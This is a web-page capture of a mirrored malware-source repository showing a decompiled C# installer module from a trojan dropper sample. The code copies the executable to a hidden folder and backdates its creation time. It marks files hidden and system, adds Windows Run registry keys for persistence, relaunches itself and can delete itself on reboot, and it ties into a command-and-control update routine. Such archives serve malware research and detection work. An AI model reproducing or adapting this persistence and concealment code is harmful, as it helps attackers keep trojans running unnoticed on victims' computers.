ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc/_Install.cs

189 lines
5.7 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Poly._Install
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
namespace Poly
{
internal class _Install : Base_Settings
{
public override void Initialise()
{
if (!Base_Settings.wait)
{
Console.WriteLine("Install called...");
this.Install();
}
else
{
while (Base_Settings.wait)
{
Console.WriteLine("Sleeping just in time...");
Thread.Sleep(5000);
}
if (Base_Settings.wait)
return;
Console.WriteLine("Installing");
this.Install();
}
}
public override void Run()
{
}
private void Install()
{
if (!Base_Settings.isExePath())
{
Console.WriteLine("Copying to specified disk location");
this.Drop();
this.WriteRegistry();
Console.WriteLine("Successfully copied. Attempting to start process");
Process.Start(Base_Settings.filePath + Base_Settings.fileName);
Process.GetCurrentProcess().Kill();
}
else
{
this.Drop();
this.WriteRegistry();
Base_Settings.status = "Installed!";
}
}
private void Drop()
{
Console.WriteLine("Install Path is " + Base_Settings.filePath);
try
{
if (!Directory.Exists(Base_Settings.filePath))
Directory.CreateDirectory(Base_Settings.filePath);
}
catch (Exception ex)
{
Console.WriteLine("Directory Not Found... Creating new one at" + Base_Settings.filePath + "\n" + ex.ToString());
}
try
{
string str = Base_Settings.filePath + Base_Settings.fileName;
Console.WriteLine("Moving to {0}", (object) str);
if (!API.MoveFileEx(Process.GetCurrentProcess().MainModule.FileName, str, API.MoveFileFlags.MOVEFILE_REPLACE_EXISTING))
File.Copy(Process.GetCurrentProcess().MainModule.FileName, str, true);
Console.WriteLine("File successfully moved to {0}", (object) (Base_Settings.filePath + Base_Settings.fileName));
}
catch (Exception ex)
{
Console.WriteLine("Could Not copy file to specified folder\n" + ex.ToString());
}
try
{
Random random = new Random();
int day = random.Next(1, 28);
int month = random.Next(1, 12);
int year = random.Next(2000, DateTime.Now.Year);
Directory.SetCreationTime(Base_Settings.filePath + Base_Settings.fileName, new DateTime(year, month, day));
}
catch
{
}
try
{
File.SetAttributes(Base_Settings.filePath, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.NotContentIndexed);
}
catch
{
}
try
{
File.SetAttributes(Path.Combine(Base_Settings.filePath, Base_Settings.fileName), FileAttributes.Hidden | FileAttributes.System | FileAttributes.NotContentIndexed);
}
catch
{
}
}
public void WriteRegistry()
{
try
{
if (!Base_Settings.isAdmin)
Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
else
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
}
catch
{
}
try
{
if (!Base_Settings.isAdmin)
return;
Registry.CurrentUser.CreateSubKey("SYSTEM\\CurrentControlSet\\Services").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
}
catch
{
}
}
public static void Uninstall()
{
try
{
Base_Settings.status = "Removing";
if (!Base_Settings.isAdmin)
Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").DeleteValue(Base_Settings.regName);
else
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").DeleteValue(Base_Settings.regName);
string tempFileName = Path.GetTempFileName();
File.Copy(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
File.Delete(Base_Settings.filePath + Base_Settings.fileName);
}
catch
{
}
_Install.QueueForDeletion();
Base_Settings.busy = false;
Thread.Sleep(10000);
Base_Settings.cleanUp();
}
public static void Update(string Path)
{
new Thread(new ThreadStart(_Install.Uninstall)).Start();
Base_Settings.status = "Updated";
_communicate.setReturn(1);
_communicate.forceTalk();
Process.Start(Path);
}
private static void QueueForDeletion()
{
try
{
string tempFileName = Path.GetTempFileName();
File.Delete(tempFileName);
File.Move(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
try
{
Directory.Delete(Base_Settings.filePath, true);
}
catch
{
}
API.MoveFileEx(tempFileName, (string) null, API.MoveFileFlags.MOVEFILE_DELAY_UNTIL_REBOOT);
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
}
}
Reference in New Issue Copy Permalink